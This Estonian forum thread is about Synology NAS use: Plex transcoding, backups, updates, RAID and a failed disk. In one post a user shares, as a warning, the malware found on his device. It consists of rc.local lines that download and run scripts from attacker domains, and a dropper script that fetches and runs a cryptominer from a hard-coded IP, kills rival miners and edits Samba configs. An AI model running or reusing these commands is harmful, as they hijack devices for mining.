|
Hinnavaatlus
:: Foorum
:: Uudised
:: Ärifoorumid
:: HV F1 ennustusvõistlus
:: Pangalink
:: Telekavad
:: HV toote otsing
|
|
| autor |
|
Etz
HV Guru

liitunud: 27.01.2005
|
07.06.2017 00:02:37
|
|
|
| ufo56 kirjutas: |
| Hmm, settings-server-transcode ja seal linnuke use hardware transcoding ? |
Pole sellist kohta, Ilmselt passi teema...
Ehk siis HW Transcode valik puudub.
_________________ ...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen! |
|
| tagasi üles |
|
 |
ufo56
HV Guru

liitunud: 18.11.2004
|
|
| tagasi üles |
|
 |
Etz
HV Guru

liitunud: 27.01.2005
|
07.06.2017 00:07:41
|
|
|
| ufo56 kirjutas: |
| Tahad testin DS412+ peal ? On võimalus. |
412+ ei evi minu teada vastavad rauda, et HW transcodingut teha.
Pole GPU'd selle prosel. AFAIK toimub HW transcoding üle QuickSynci Intelitel.
Täna ei viitsi rohkem nokkida kah, vaatab homme edasi...võtab võibolla kuuks selle passi siis prooviks...
_________________ ...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen!
viimati muutis Etz 07.06.2017 00:13:03, muudetud 1 kord |
|
| tagasi üles |
|
 |
ufo56
HV Guru

liitunud: 18.11.2004
|
07.06.2017 00:10:07
|
|
|
Ongi nii. Atomi prose. Kohe vaatab mis teisel synol kõhus on.
EDIT: See ka atom. Pead plex passi ikka võtma kuuks.
_________________
Lae pildid -> pilt.io |
|
| tagasi üles |
|
 |
Etz
HV Guru

liitunud: 27.01.2005
|
07.06.2017 10:40:17
|
|
|
| ufo56 kirjutas: |
Ongi nii. Atomi prose. Kohe vaatab mis teisel synol kõhus on.
EDIT: See ka atom. Pead plex passi ikka võtma kuuks. |
Yep, ilma premiumita (server peab olema samuti claimitud) seda linnukese kohta lihtsalt ei kuvata.
Samas ühe 1080p striimi transkoodimise korral on nüüd prose load ca ~4%...
Nüüd siis veel vaja uurida, kuidas selle TV (Selle Firmware on lihtsalt "katki") jaoks saaks DTS > AC3 conversiooni tööle ja elu olekski taas lill...
_________________ ...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen! |
|
| tagasi üles |
|
 |
ufo56
HV Guru

liitunud: 18.11.2004
|
07.06.2017 11:00:48
|
|
|
Pole paha siis.
Mul endal vähe keerulisem kompott, unraid mille seljas siis dockeriga plex. Pole uurinud kas praegune dockeri plexi image tegija (linuxserver.io) plaanib ka HW transcode supporti. Ja veel omaette teema kuidas unraid videokaartidesse suhtub. Samas VM masinatesse saab teha kenasti passtrough. Ja veel 2U kasti videokaardi mahutama kuhugi kuidagi. Ilmselt mingi AMD kaart kuna nvidia piirab kõigil 2 streami peale HW transcode. Väljaarvatud quadro kaardid.
_________________
Lae pildid -> pilt.io |
|
| tagasi üles |
|
 |
Etz
HV Guru

liitunud: 27.01.2005
|
07.06.2017 17:42:07
|
|
|
ufo56, Unraid peaks ilusti GPU'dega hakkama saama:
Spoiler 
Huvitav, kas uuemad serveri versioonid kah HW Transcodet teevad?
EDIT: Nope, ainult see konkreetne build.
| Etz kirjutas: |
Samas ühe 1080p striimi transkoodimise korral on nüüd prose load ca ~4%...  |
Sõltuvalt source bitratest, siis jääb sinna kuskile 4-12% vahele, selle konkreetse buildiga.
Mina olen rahul...
EDIT: DTS to EAC3 töötab kah...
_________________ ...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen! |
|
| tagasi üles |
|
 |
Helseth
HV kasutaja
liitunud: 05.01.2012
|
16.06.2017 22:36:41
|
|
|
Küsin, mismoodi te windowsi masinatest oma synology ja qnapide peale automaatseid backupe teete?
Olen ise muidu enamasti teinud lihtsa skripti, mis mountib samba sheeri backupi tegemise ajaks külge, seejärel cwrsync'iga kopeerib vahepeal muudetud failid üle ning lõpus haagib lahti.
Miinuseks on see, et kui tädi maali paneb poole pealt skripti kinni, siis jääb samba sheer mount'ituks.
Mõtlesin, et võimalus oleks otse windowsi masinast rsync'ida qnapi peale. Sai kõvasti üritatud sellist varianti tööle saada, aga qnapi rsyncd on nii ära kohitsetud, et töötab ainult ühe rsync kasutajaga.
Mis variante veel on, et krüptoviiruse korral backupe ka ära krüpteeritaks.
|
|
| tagasi üles |
|
 |
warwas
HV Guru

liitunud: 06.07.2003
|
16.06.2017 22:53:10
|
|
|
Endal kasutuses Veeam Agent for Microsoft Windows (endise nimega Veeam Endpoint Backup). Rohkem juttu siin -> https://www.veeam.com/windows-linux-availability-agents.html
Seal saad varundamiseks mõeldud share jaoks eraldi kasutaja/parooli anda. Varundamisprotsessi ajal seda otseselt kuhugi nähtavasse kohta külge ei haagitagi. Saad teha nii kindlatest kataloogidest kui tervest masinast. Viimane variant on eriti hea, kui näiteks ketas kooleb või saadki mingi krüptopasaga pihta. Tõmba ainult masin recovery meedia pealt püsti ja taasta soovitud seis. Proovitud korduvalt, töötab igati edukalt. Alles täna sai üks kaotsi läinud Bitlockeri võtmega masin uuesti kasutatavaks tehtud.
|
|
| tagasi üles |
|
 |
anubis
HV Guru

liitunud: 08.06.2002
|
16.06.2017 23:09:36
|
|
|
@warwas
|
|
| tagasi üles |
|
 |
Helseth
HV kasutaja
liitunud: 05.01.2012
|
17.06.2017 01:01:27
|
|
|
| Tundub tõesti rohkete võimalustega, kuid hind tuleb ka päris kõrbe kui 45€ euri küsitakse per masin. Teeb ainuüksi mõne ettevõtte aastase IT-kulutuste eelarve kokku.
|
|
| tagasi üles |
|
 |
warwas
HV Guru

liitunud: 06.07.2003
|
|
| tagasi üles |
|
 |
Helseth
HV kasutaja
liitunud: 05.01.2012
|
18.06.2017 11:18:29
|
|
|
Tundub, et läheb käiku.
|
|
| tagasi üles |
|
 |
ufo56
HV Guru

liitunud: 18.11.2004
|
30.06.2017 12:09:41
|
|
|
Vaadake oma Synologyd üle. Ühest Synost avastasin sellise asja siis. Sama ip otsas veel üks Syno ja see oli puhas. Kõik värskemad uuendused peal aga mingi päev tekkis selline protsess nagu "cpuminer". SSH kinni ja kasutajaid vaid mõni ning korralikult paroolid kõigil. Kust või kuidas sisse saadi ei oska öelda. Jälile ei jõudnud sellele.
rc.local alla oli tekkinud siis sellised read. (domeenid olid üsna sarnased, suvalised tähed aga siin muutsin ära)
wget -q http://update.sdgnsaddsfajfsdf.info/upd -O /tmp/updatescript;sh /tmp/updatescript;rm -rf /tmp/updatescript > /dev/null 2>&1
wget -q http://update.sdgnasddsfajfsdf.info/upd -O /tmp/updatescript;sh /tmp/updatescript;rm -rf /tmp/updatescript > /dev/null 2>&1
wget -q http://update.sdgasdsafdsf.pw/upd2 -O /tmp/updatescript2;sh /tmp/updatescript2;rm -rf /tmp/updatescript2 > /dev/null 2>&1
wget -q http://update.sdgasdsafdsf.pw/upd2 -O /tmp/updatescript2;sh /tmp/updatescript2;rm -rf /tmp/updatescript2 > /dev/null 2>&1
wget -q http://update.omsadfg.pw/upd3 -O /tmp/updatescript3;sh /tmp/updatescript3;rm -rf /tmp/updatescript3 > /dev/null 2>&1
wget -q http://update.oasdmfg.pw/upd3 -O /tmp/updatescript3;sh /tmp/updatescript3;rm -rf /tmp/updatescript3 > /dev/null 2>&1 |
Scripti enda sisu
#!/bin/sh
killall cpuminer
rm -rf /tmp/cpuminer
wget -q http://188.138.109.103/cpuminer -O /tmp/cpuminer
chmod +x /tmp/cpuminer
/tmp/cpuminer&
wget -q http://188.138.109.103/bb -O /tmp/bb;chmod +x /tmp/bb;/tmp/bb
pkill -f stratum
pkill -f "/tmp/apache"
pkill -f "/tmp/httpd.conf"
pkill -f cryptonight
pkill -f wqbtraqbpv
if cat /etc/samba/smb.conf | grep "nt pipe support = no" ; then
echo nm
else
sed -i '/global/a nt pipe support = no' /etc/samba/smb.conf
fi
if cat /etc/smb.conf | grep "nt pipe support = no" ; then
echo nm
else
sed -i '/global/a nt pipe support = no' /etc/smb.conf
fi
if cat /etc/config/smb.conf | grep "nt pipe support = no" ; then
echo nm
else
sed -i '/global/a nt pipe support = no' /etc/config/smb.conf
fi
if cat /etc/default_config/smb.conf | grep "nt pipe support = no" ; then
echo nm
else
sed -i '/global/a nt pipe support = no' /etc/default_config/smb.conf
fi
ps -ef|grep 'irq.sh' |grep -v grep |cut -c 9-15 |xargs kill -9;
ps -ef|grep 'irqbalan' |grep -v grep |cut -c 9-15 |xargs kill -9;
exit
|
_________________
Lae pildid -> pilt.io |
|
| tagasi üles |
|
 |
anubis
HV Guru

liitunud: 08.06.2002
|
30.06.2017 12:17:20
|
|
|
| Edastasid Synologyle ka?
|
|
| tagasi üles |
|
 |
ufo56
HV Guru

liitunud: 18.11.2004
|
|
| tagasi üles |
|
 |
-vodafone-
HV Guru

liitunud: 26.04.2005
|
30.06.2017 13:10:19
|
|
|
Syno purki kasutati kaevamiseks?
|
|
| tagasi üles |
|
 |
ufo56
HV Guru

liitunud: 18.11.2004
|
30.06.2017 13:13:54
|
|
|
Jah, seda on varem ka olnud. Neti juttude järgi. Kunagi kaevati dogecoine. Kahe päevaga aeti vist üle maailma Synode peale 600k usd kokku.
_________________
Lae pildid -> pilt.io |
|
| tagasi üles |
|
 |
Etz
HV Guru

liitunud: 27.01.2005
|
30.06.2017 13:33:46
|
|
|
ufo56, kuidas jälile said?
CPU laes ja kõik liikus nagu tatt?
_________________ ...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen! |
|
| tagasi üles |
|
 |
ufo56
HV Guru

liitunud: 18.11.2004
|
30.06.2017 15:19:53
|
|
|
| tsitaat: |
CPU laes ja kõik liikus nagu tatt?
|
Täpselt nii. Mitmendat päeva vaatasin et mingil põhjusel paari serveri backupid üle iSCSI võtavad kuidagi liiga kaua aega.
_________________
Lae pildid -> pilt.io |
|
| tagasi üles |
|
 |
timoo
HV vaatleja

liitunud: 15.06.2009
|
12.07.2017 14:23:48
|
|
|
Hetkel DS216j sees üks 4TB-ne ketas. Sooviks selle asendada kahe 10TB kettaga, et ka backup olemas oleks. Kuidas andmeid kõige valutumalt uuele kettale saaks?
Kõlaks loogiliselt, kui hetkel tühja pessa panna 10ne ketas ning andmed üle kanda, kuid kas see ka nii töötab?
|
|
| tagasi üles |
|
 |
anubis
HV Guru

liitunud: 08.06.2002
|
|
| tagasi üles |
|
 |
Dijital
HV Guru

liitunud: 09.06.2003

|
17.07.2017 13:13:54
|
|
|
Huvitav, et ükspäev mu ustav purk DS214, millel DSM 6.1.2 peal, näitas, et 6.1.2-le on uuendus Update 1. Ei viitsinud kohe tegeleda ning nüüd mõni päev tagasi näitas, et on olemas juba 6.1.3. Mõtlesin, et las tirib siis alla ja uuendab end ära 6.1.3 peale. Huvitaval kombel aga näitas peale uuendust, et on 6.1.2 Update 1 ning et see on uusim ja 6.1.3 enam ei pakugi.
_________________ OBSBOT veebipoe affiliate link / 5% sooduskood: TUIKOTREW
Müüa uus Agon by AOC 610Hz monitor AG246FK6 |
|
| tagasi üles |
|
 |
sukelduja
HV Guru

liitunud: 14.06.2007
|
17.07.2017 13:28:05
|
|
|
| Dijital kirjutas: |
| Huvitav, et ükspäev mu ustav purk DS214, millel DSM 6.1.2 peal, näitas, et 6.1.2-le on uuendus Update 1. Ei viitsinud kohe tegeleda ning nüüd mõni päev tagasi näitas, et on olemas juba 6.1.3. Mõtlesin, et las tirib siis alla ja uuendab end ära 6.1.3 peale. Huvitaval kombel aga näitas peale uuendust, et on 6.1.2 Update 1 ning et see on uusim ja 6.1.3 enam ei pakugi. |
Viimase paari kolme nädalaga on juba 3 uuendust tulnud.
|
|
| tagasi üles |
|
 |
Dijital
HV Guru

liitunud: 09.06.2003

|
17.07.2017 13:43:13
|
|
|
Mind pani hämmastama just see, et ta ise pakkus küll kõige uuemat, kuid installis ikkagi vanema versiooni ja enam seda uuemat, mida ta enne ka ise pakkus, uuesti ei paku. Saaksin sellest siis aru, kui on mingi viga leitud ja igalt poolt on see uuendus tagasi tõmmatud, kuid kõikides us, de, uk ja global serverites on see siiski manuaalselt alla laaditav.
_________________ OBSBOT veebipoe affiliate link / 5% sooduskood: TUIKOTREW
Müüa uus Agon by AOC 610Hz monitor AG246FK6 |
|
| tagasi üles |
|
 |
mikk36
HV Guru

liitunud: 21.02.2004
|
18.07.2017 16:27:43
|
|
|
| Gradual rollout, tõenäoliselt hiljem hakkab uuesti pakkuma seda uusimat.
|
|
| tagasi üles |
|
 |
Dirty Harry
HV Guru

liitunud: 05.09.2002
|
20.07.2017 12:26:02
|
|
|
Synology tugi on ikka tasemel. Enda DS411+ on aastast 2010 aga seni tuleb pidevalt softiuuendusi ja turvalappe. Ning tegu pole enterprice vidinaga, home/SOHO isend. Muidugi vbolla ma nüüd sõnun ära aga vägev värk igaljuhul.
|
|
| tagasi üles |
|
 |
jägaja
HV Guru

liitunud: 06.08.2004
|
21.07.2017 09:24:25
|
|
|
Mark0, Qnap samamoodi veel väljastab uuendusi sama vanale seadmele, aga seade ise on EOL.
Tarkvarauuendusest vähe kasu, kui tänaseks aegunud nadi riistvara igal hetkel piirab
Backup serveriks kõlbab veel.
Sellel synol on vähemalt mälu, mu vanal serveril 256mega
_________________ " Maailm on täis kõikvõimalike külatarkade kogukondi, kelle ühine joon on teadus- ja tõenduspõhisele elukäsitusele vastandumine." |
|
| tagasi üles |
|
 |
Etz
HV Guru

liitunud: 27.01.2005
|
21.07.2017 10:25:48
|
|
|
jägaja, DS411+ mälu upgrade pole ka probleem, SO-DIMM...
_________________ ...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen! |
|
| tagasi üles |
|
 |
Dirty Harry
HV Guru

liitunud: 05.09.2002
|
21.07.2017 11:13:55
|
|
|
| Just, seetõttu ongi konkreetne mudel endal valitud kuna neid pulki veel leidub (endalgi on 1+1GB). Samas sellest on tegelikult ka pool vaba ning kast teenindab kenasti keskmise rahuliku kodu ära muretult. Just seetõttu on tore, et tootja ikka veel tuge pakub.
|
|
| tagasi üles |
|
 |
indrpo
HV Guru
liitunud: 14.11.2004
|
24.07.2017 20:03:32
|
|
|
Kindlasti ajuvaba ning loll küsimus aga kas Synology Hybrid Raid lahenduselt võiks eemaldada ketta ning parandada raidi ilma uut ketast lisamata KUI raidis on piisavalt vaba mahtu?
Kõik viitab ainult sellele, et kui üks ketas saba annab, pead asendama KINDLASTI sama suure või suurema kettaga ning alles siis saad raidi parandada.
ST. kui ei saa, siis kõigest varukoopia ning nullist seadistamine vähema arvu ketastega.
Miks ma tahan seda teha, mul on 8 kettaga SHR ning datat on vähemaks jäänud ja pole mõtet 8l kettal seal unnata lasta, seda enam, et kettad on suuremaks läinud ja 5st kettast piisaks täiesti.
Plaan oli 1 kaupa vähemaks tõmmata ja rebuild teha iga kord aga ilmselt on see tehniliselt mitte tehtav.
|
|
| tagasi üles |
|
 |
Etz
HV Guru

liitunud: 27.01.2005
|
24.07.2017 20:18:22
|
|
|
indrekp, ei või...nagu ka tavalise RAID'i puhul...kettaid võib alati juurde laduda, aga vähemaks võtta enam niisama lihtsalt ei saa.
SHR tegelikult pole muud, kui tavaline RAID ja LVM volume selle otsas...
_________________ ...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen! |
|
| tagasi üles |
|
 |
indrpo
HV Guru
liitunud: 14.11.2004
|
24.07.2017 20:56:50
|
|
|
| Etz kirjutas: |
indrekp, ei või...nagu ka tavalise RAID'i puhul...kettaid võib alati juurde laduda, aga vähemaks võtta enam niisama lihtsalt ei saa.
SHR tegelikult pole muud, kui tavaline RAID ja LVM volume selle otsas... |
Olin selles ise peaaaegu kindel aga pidin küsima. Varukoopia tegemine on juba poolepeal
|
|
| tagasi üles |
|
 |
Some
HV vaatleja
liitunud: 07.11.2001
|
31.07.2017 12:25:41
|
|
|
| Ise kasutan Drobo Prod-d ja see paraneb küll mahu olemasolul ise. Juba kaks 2TB ketast lennanud ja olen asendamata jätnud, sest ainult kolmandik massiivist täis nende aastatega. Ja et TB läheb iga aastaga aina odavamaks, siis ma upgradega eriti ei kiirusta.
|
|
| tagasi üles |
|
 |
mikk36
HV Guru

liitunud: 21.02.2004
|
31.07.2017 14:47:29
|
|
|
| Some, mitu ketast kokku on seal sees?
|
|
| tagasi üles |
|
 |
Etz
HV Guru

liitunud: 27.01.2005
|
31.07.2017 21:53:18
|
|
|
Mismoodi Synology kastile viisakalt füüsilist shutdowni/restarti saab teha?
SMART test jäi rippuma, üks ketastest on kutu...ligi aga enam kuskilt ei saa...
Isegi SSH peale ei võta toru, sessioon jääb lihtsalt rippuma.
Toitenupule kah ei reageeri...power LED jääb vilkuma ning kast on endiselt "koomas"...
Vigase ketta kiskusin välja, ketta tuli muidugi endiselt vilgub ja seis suht sama.
Enne mölises midagi Bad sectorite ja IO errorite kohta ühel kettal, mõtlesin et teeks kettatesti ja saadaks ketta garantiisse...aga näed...
Enam ei julge WD Red'e soovitada kellelegi samuti, viimasel ajal on mingi mass suremine mul tekkinud, kettad ise suht uued...alla aasta vanad.
_________________ ...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen! |
|
| tagasi üles |
|
 |
indrpo
HV Guru
liitunud: 14.11.2004
|
31.07.2017 22:01:38
|
|
|
Etz, hoiad poweri nuppu pikalt all kuni käib kriiiiiks, ja siis ta vaikselt vilgutab pwr tuld ning teeb 30sek jooksul tuvalise shut downi.
päris jõuga offi lasta võid ju veel pikema hoidmisega või saba seinast.
|
|
| tagasi üles |
|
 |
Etz
HV Guru

liitunud: 27.01.2005
|
31.07.2017 22:02:56
|
|
|
| indrekp kirjutas: |
Etz, hoiad poweri nuppu pikalt all kuni käib kriiiiiks, ja siis ta vaikselt vilgutab pwr tuld ning teeb 30sek jooksul tuvalise shut downi.
päris jõuga offi lasta võid ju veel pikema hoidmisega või saba seinast. |
Kui pikalt seda power buttonit all hoida tuleks, 10 seki jooksul ta igatahes ei piiksatanud...
Power tuluke muidu vilgub nüüd küll...aga mida ei toimu on shutdown...
Hoidsin natuke pikemalt, ei mingit piiksu...forced shutdown tehti hoopis...
_________________ ...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen!
viimati muutis Etz 31.07.2017 22:04:11, muudetud 1 kord |
|
| tagasi üles |
|
 |
warwas
HV Guru

liitunud: 06.07.2003
|
31.07.2017 22:03:51
|
|
|
| Etz kirjutas: |
Isegi SSH peale ei võta toru, sessioon jääb lihtsalt rippuma.
Toitenupule kah ei reageeri...power LED jääb vilkuma ning kast on endiselt "koomas"...
Vigase ketta kiskusin välja, ketta tuli muidugi endiselt vilgub ja seis suht sama.
Enne mölises midagi Bad sectorite ja IO errorite kohta ühel kettal, mõtlesin et teeks kettatesti ja saadaks ketta garantiisse...aga näed...  |
Mul oli omal ühe kastiga, kus ka veidi hapud kettad sees olid, kunagi suht samad sümptomid. Siis ei aidanud tõesti miski muu, kui juhme seinast tõmbamine.
|
|
| tagasi üles |
|
 |
indrpo
HV Guru
liitunud: 14.11.2004
|
31.07.2017 22:05:41
|
|
|
| Etz kirjutas: |
| indrekp kirjutas: |
Etz, hoiad poweri nuppu pikalt all kuni käib kriiiiiks, ja siis ta vaikselt vilgutab pwr tuld ning teeb 30sek jooksul tuvalise shut downi.
päris jõuga offi lasta võid ju veel pikema hoidmisega või saba seinast. |
Kui pikalt seda power buttonit all hoida tuleks, 10 seki jooksul ta igatahes ei piiksatanud...
Power tuluke muidu vilgub nüüd küll...aga mida ei toimu on shutdown... |
Kui seda piixu ei käi siis on vist tõesti oma ketastega korralikult käpuli.
Saba seinast võib muidugi lõppeda korraliku krahhiga ja varukoopia aitab.
PS. mul oli just sarnane keiss aga veidi teistmoodi. uuendus mingile 6.1.x vms versioonile. Läks peale seda rebooti ja jäigi vilkuma. Kettaid järele ei võtnud.
Google aitas, pane kinni, kettad välja, lase käima, annab veateate, lükka kettad sisse ja siis uus soft peale, raid säilis koos andmetega.
võib olla see:
https://www.synology.com/en-uk/knowledgebase/DSM/tutorial/General/What_can_I_do_if_the_STATUS_LED_keeps_flashing_in_orange
viimati muutis indrpo 31.07.2017 22:11:43, muudetud 1 kord |
|
| tagasi üles |
|
 |
Etz
HV Guru

liitunud: 27.01.2005
|
31.07.2017 22:06:08
|
|
|
warwas, nohjah, mul hetkel asi nii lõppeski...
Suhteliselt sitt case, siiani polnud mul ainumaski WD Red ära surnud, nüüd läksid kaks tükki järjest...
_________________ ...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen! |
|
| tagasi üles |
|
 |
warwas
HV Guru

liitunud: 06.07.2003
|
31.07.2017 22:10:54
|
|
|
| indrekp kirjutas: |
| Etz kirjutas: |
| indrekp kirjutas: |
Etz, hoiad poweri nuppu pikalt all kuni käib kriiiiiks, ja siis ta vaikselt vilgutab pwr tuld ning teeb 30sek jooksul tuvalise shut downi.
päris jõuga offi lasta võid ju veel pikema hoidmisega või saba seinast. |
Kui pikalt seda power buttonit all hoida tuleks, 10 seki jooksul ta igatahes ei piiksatanud...
Power tuluke muidu vilgub nüüd küll...aga mida ei toimu on shutdown... |
Kui seda piixu ei käi siis on vist tõesti oma ketastega korralikult käpuli.
Saba seinast võib muidugi lõppeda korraliku krahhiga ja varukoopia aitab. |
Eks serial konsool tooks tõe päevavalgele, aga mul on tunne, et pärast seda kriiksu, kui hakatakse teenuseid kokku korjama ja mingi deemoni killimine rippu jääb, siis jääb ka see tuli aegade lõpuni vilkuma. SSH on arvatavasti üks esimesi, kes tudule saadetakse. Saab loota ainult seda, et igast cache'id jms. mälus olevad andmed on ilusti ketastele maha kirjutatud
viimati muutis warwas 31.07.2017 22:12:11, muudetud 2 korda |
|
| tagasi üles |
|
 |
Dirty Harry
HV Guru

liitunud: 05.09.2002
|
|
| tagasi üles |
|
 |
Etz
HV Guru

liitunud: 27.01.2005
|
31.07.2017 22:13:13
|
|
|
| warwas kirjutas: |
| Eks serial konsool tooks tõe päevavalgele, aga mul on tunne, et pärast seda kriiksu, kui hakatakse teenuseid kokku korjama jääb mingi deemoni killimine rippu jääb, siis jääb ka see tuli aegade lõpuni vilkuma. SSH on arvatavasti üks esimesi, kes tudule saadetakse. Saab loota ainult seda, et igast cache'id jms. mälus olevad andmed on ilusti ketastele maha kirjutatud |
SSH suri tegelikult ära koos Weebiinterfacega ja enne kui ma seda Power nuppu üldse torkima läksin...
Õnneks on mul olulisest, nii onsite kui offsite backup.
_________________ ...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen! |
|
| tagasi üles |
|
 |
Markos
HV veteran
liitunud: 10.04.2002
|
01.08.2017 23:11:09
|
|
|
| Synology sees on tavaline md/lvm, kui asi ongi hapu, võid need kettad pärast tavalise arvuti külge panna ja vaadata, kas on midagi päästa või mitte. jbodi ja mirrori puhul eriti lihtne, hybridi puhul natuke keerulisem.
|
|
| tagasi üles |
|
 |
Etz
HV Guru

liitunud: 27.01.2005
|
02.08.2017 08:21:50
|
|
|
| Markos kirjutas: |
| Synology sees on tavaline md/lvm, kui asi ongi hapu, võid need kettad pärast tavalise arvuti külge panna ja vaadata, kas on midagi päästa või mitte. jbodi ja mirrori puhul eriti lihtne, hybridi puhul natuke keerulisem. |
Jah tean, aga kuna array'st suri ära ainult 1 ketas, siis pole ka vajadust midagi päästa, läks uus ketas (Ordi vahetas ketta mõne tunniga ringi) sisse ja repair.
Lisaks on mul olulisest kraamist nii onsite kui offsite backup, seega ei viitsisks ilmselt isegi täieliku hävingu korral sellega väga tegeleda.
Ainus asi, mida mul varem juhtunud pole, on ssee et kogu kast ära minestab kui üks ketastest hapuks läheb.
Peale jõuga tehtud shutdowni, buutis igatahes ilm selle hapu kettata ilusti üles ja hakkas consistency checki tegema.
_________________ ...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen!
viimati muutis Etz 02.08.2017 09:31:51, muudetud 2 korda |
|
| tagasi üles |
|
 |
Markos
HV veteran
liitunud: 10.04.2002
|
02.08.2017 08:41:48
|
|
|
| Mis driveplan on ? jbodi ja peegli puhul hoiab ta iga ketta peal bootloaderit ja os'i koopiat. Kui see ketas, millelt üles booditi, ära sureb, on loogiline jätk, et kast kokku jookseb.
|
|
| tagasi üles |
|
 |
pppd
Kreisi kasutaja
liitunud: 21.06.2004
|
02.08.2017 08:50:08
|
|
|
| Markos kirjutas: |
| Mis driveplan on ? jbodi ja peegli puhul hoiab ta iga ketta peal bootloaderit ja os'i koopiat. Kui see ketas, millelt üles booditi, ära sureb, on loogiline jätk, et kast kokku jookseb. |
mitte ainult jbod ja mirrori, vaid ka raid5 või raid6 puhul peaks os olema peegeldatud kõikide ketaste peale. suure kasti kõhust on tore vaadata, kuidas md0 on 12-way mirror Ehk siis, nii kaua kuni vähemalt üks ketas veel kastis töötab, peaks os-i partitsioon toimiv olema.
|
|
| tagasi üles |
|
 |
Markos
HV veteran
liitunud: 10.04.2002
|
02.08.2017 08:57:14
|
|
|
| Küllap ta nii on jah, pole kõrgemaid leveleid ja hybridi lähemalt uurinud.
|
|
| tagasi üles |
|
 |
Etz
HV Guru

liitunud: 27.01.2005
|
02.08.2017 10:16:42
|
|
|
| Markos kirjutas: |
| Mis driveplan on ? jbodi ja peegli puhul hoiab ta iga ketta peal bootloaderit ja os'i koopiat. Kui see ketas, millelt üles booditi, ära sureb, on loogiline jätk, et kast kokku jookseb. |
SHR2, a.k.a RAID6 ehk siis jah, iga ketta peal on OS, Swap, jne...bootloader on AFAIK eraldi flashil neil...
| pppd kirjutas: |
| Ehk siis, nii kaua kuni vähemalt üks ketas veel kastis töötab, peaks os-i partitsioon toimiv olema. |
Nii peaks olema jah...
Huvitav on muidugi see, et kast viskas lusika nurka smartctl'i peale...mis jäi 10% peale rippuma sellel kettal.
Võimalik et ka see on "tavaline", ise pole kunagi varem sellist asja kohanud muidugi...
_________________ ...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen! |
|
| tagasi üles |
|
 |
|